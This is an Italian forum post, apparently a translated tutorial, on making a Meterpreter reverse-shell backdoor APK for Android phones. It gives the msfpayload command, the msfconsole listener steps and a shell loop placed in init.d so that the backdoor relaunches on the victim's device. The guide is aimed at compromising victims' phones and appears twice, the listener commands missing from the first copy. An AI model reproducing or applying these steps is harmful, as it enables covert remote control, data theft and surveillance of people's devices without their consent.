Ultima modifica:
Salve, questa guida non è di mia creazione, ma è la traduzione di quella presente a QUESTO indirizzo.
Requisiti :
Kali Linux
Linux
Creazione della backdoor :
Prima di tutto apriamo un terminale di Kali e creiamo la nostra backdoor utilizzando questo comando
msfpayload android/meterpreter/reverse_tcp LHOST=IPVOSTRO LPORT=PORTA R > /root/NOMEFILE.apk
Accuratezze :
IPVOSTRO : Indicare il vostro IP Locale se l'attacco sarà in LAN, altrimenti inserite il vostro IP pubblico;
PORTA : La vostra porta in ascolto, se volete fare un attacco in WAN assicuratevi di attuare un Port Forwading sul vostro router;
NOMEFILE : E' il nome del file, della backdoor, che sarà generato. Ovviamente l'estensione lasciatela .apk dal momento che l'attacco sarà su un cellulare Android.
Attiviamo il listener :
Se vogliamo eseguire l'attacco, dobbiamo essere ovviamente pronti a ricevere la richiesta di connessione da parte del cellulare della vittima, quindi mettiamoci in ascolto.
Entrate su msfconsole e eseguite i comandi uno ad uno
Dopo aver fatto ciò basterà attendere che il file venga attivato dalla vittima e riceverete una connessione.
Accuratezze :
IPRIVATO : Qui non dovete mettere alcun IP pubblico anche se l'attacco avviene in LAN, ma bensì l'IP privato della vostra macchina
PORTA : La vostra porta in ascolto, quella che avete inserito nelle impostazioni di Port Forwading in caso di attacco in WAN
Rendere persistente questa backdoor :
Prima di tutto dovete sapere che per rendere persistente una backdoor su android è necessario il permesso di root. Detto questo, procediamo.
Creiamo un file avente qualsiasi nome ma estensione .sh e mettiamo questo codice all'interno
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done
successivamente salviamolo e prepariamoci nel caricarlo sul cellulare della vittima dopo la prima connessione meterpreter.
Caricare il file sul cellulare della vittima :
Abbiamo due situazioni possibili :
- Permessi di root abilitati
- Permessi di root disabilitati
Nel primo caso potremo caricare il file in una directory che permetterà alla backdoor di avviarsi ad ogni riavvio del cellulare.
Nel secondo caso, una volta eseguito lo script di persistenza, la backdoor continuerà a inviare richieste al nostro IP fino a quando il cellulare non verrà riavviato.
Nel caso in cui vi siano i permessi di root, spostiamoci di cartella in cartella con la nostra connessione meterpreter (utilizzando il comando cd) con lo scopo di raggiungere la folder system/etc/init.d .
Una volta arrivati, carichiamo il nostro file avente estensione .sh utilizzando il comando upload
upload nomefile.sh (al posto di "nomefile" mettete, ovviamente, il nome del vostro file)
Nel caso in cui non vi siano i permessi di root, non potrete caricare il file in system/etc/init.d, perciò dovrete limitarvi nel caricarlo in una cartella meno protetta tipo quella di Download e avviare il file.
Per avviare il file caricato, basterà utilizzare il comando shell in meterpreter, spostarvi lì dovete avete caricato il file e successivamente utilizzare il comando sh nomefile.sh (ripeto, "nomefile" è il nome che avete dato al file).
Conclusioni e precisazioni :
Il cellulare Android della vittima dovrà avere la funzione "Installa anche da origini sconosciute" attiva, se così non sarà, la vostra applicazione non verrà installata.
Per risolvere il problema dell'applicazione non firmata sembrerebbe esserci un modo per firmarla manualmente, io però preferisco testare il metodo prima di renderlo pubblico.
Sto anche pensando a un modo per rimuovere il problema del file e modificare la backdoor .apk per inserire all'interno un ciclo che avii ogni X secondi (o minuti,ore, giorni, mexi) la funzione di connessione. Vi farò sapere se ci saranno novità.
Se avete domande, sono a vostra disposizione.
Se avete critiche, spero queste siano costruttive.
Se avete consigli, sarò onorato di leggerli.
Saluti, Sekmet.-
Requisiti :
Kali Linux
Linux
Creazione della backdoor :
Prima di tutto apriamo un terminale di Kali e creiamo la nostra backdoor utilizzando questo comando
msfpayload android/meterpreter/reverse_tcp LHOST=IPVOSTRO LPORT=PORTA R > /root/NOMEFILE.apk
Accuratezze :
IPVOSTRO : Indicare il vostro IP Locale se l'attacco sarà in LAN, altrimenti inserite il vostro IP pubblico;
PORTA : La vostra porta in ascolto, se volete fare un attacco in WAN assicuratevi di attuare un Port Forwading sul vostro router;
NOMEFILE : E' il nome del file, della backdoor, che sarà generato. Ovviamente l'estensione lasciatela .apk dal momento che l'attacco sarà su un cellulare Android.
Attiviamo il listener :
Se vogliamo eseguire l'attacco, dobbiamo essere ovviamente pronti a ricevere la richiesta di connessione da parte del cellulare della vittima, quindi mettiamoci in ascolto.
Entrate su msfconsole e eseguite i comandi uno ad uno
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST IPRIVATO
- set LPORT PORTA
- exploit
Dopo aver fatto ciò basterà attendere che il file venga attivato dalla vittima e riceverete una connessione.
Accuratezze :
IPRIVATO : Qui non dovete mettere alcun IP pubblico anche se l'attacco avviene in LAN, ma bensì l'IP privato della vostra macchina
PORTA : La vostra porta in ascolto, quella che avete inserito nelle impostazioni di Port Forwading in caso di attacco in WAN
Rendere persistente questa backdoor :
Prima di tutto dovete sapere che per rendere persistente una backdoor su android è necessario il permesso di root. Detto questo, procediamo.
Creiamo un file avente qualsiasi nome ma estensione .sh e mettiamo questo codice all'interno
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done
successivamente salviamolo e prepariamoci nel caricarlo sul cellulare della vittima dopo la prima connessione meterpreter.
Caricare il file sul cellulare della vittima :
Abbiamo due situazioni possibili :
- Permessi di root abilitati
- Permessi di root disabilitati
Nel primo caso potremo caricare il file in una directory che permetterà alla backdoor di avviarsi ad ogni riavvio del cellulare.
Nel secondo caso, una volta eseguito lo script di persistenza, la backdoor continuerà a inviare richieste al nostro IP fino a quando il cellulare non verrà riavviato.
Nel caso in cui vi siano i permessi di root, spostiamoci di cartella in cartella con la nostra connessione meterpreter (utilizzando il comando cd) con lo scopo di raggiungere la folder system/etc/init.d .
Una volta arrivati, carichiamo il nostro file avente estensione .sh utilizzando il comando upload
upload nomefile.sh (al posto di "nomefile" mettete, ovviamente, il nome del vostro file)
Nel caso in cui non vi siano i permessi di root, non potrete caricare il file in system/etc/init.d, perciò dovrete limitarvi nel caricarlo in una cartella meno protetta tipo quella di Download e avviare il file.
Per avviare il file caricato, basterà utilizzare il comando shell in meterpreter, spostarvi lì dovete avete caricato il file e successivamente utilizzare il comando sh nomefile.sh (ripeto, "nomefile" è il nome che avete dato al file).
Conclusioni e precisazioni :
Il cellulare Android della vittima dovrà avere la funzione "Installa anche da origini sconosciute" attiva, se così non sarà, la vostra applicazione non verrà installata.
Per risolvere il problema dell'applicazione non firmata sembrerebbe esserci un modo per firmarla manualmente, io però preferisco testare il metodo prima di renderlo pubblico.
Sto anche pensando a un modo per rimuovere il problema del file e modificare la backdoor .apk per inserire all'interno un ciclo che avii ogni X secondi (o minuti,ore, giorni, mexi) la funzione di connessione. Vi farò sapere se ci saranno novità.
Se avete domande, sono a vostra disposizione.
Se avete critiche, spero queste siano costruttive.
Se avete consigli, sarò onorato di leggerli.
Saluti, Sekmet.-